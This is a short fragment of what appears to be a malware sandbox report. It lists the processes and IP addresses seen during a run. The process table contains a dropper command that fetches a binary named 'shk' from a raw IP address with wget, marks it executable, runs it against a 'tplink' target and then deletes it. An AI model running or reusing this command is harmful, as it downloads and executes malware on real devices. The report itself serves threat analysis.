Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/bin/sh
|
/bin/sh -c "cd /tmp; rm -rf shk; wget http://89.190.156.173/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf shk
|
||
/bin/sh
|
-
|
||
/usr/bin/wget
|
wget http://89.190.156.173/shk
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
89.190.156.173
|
unknown
|
United Kingdom
|
||
109.202.202.202
|
unknown
|
Switzerland
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
91.189.91.42
|
unknown
|
United Kingdom
|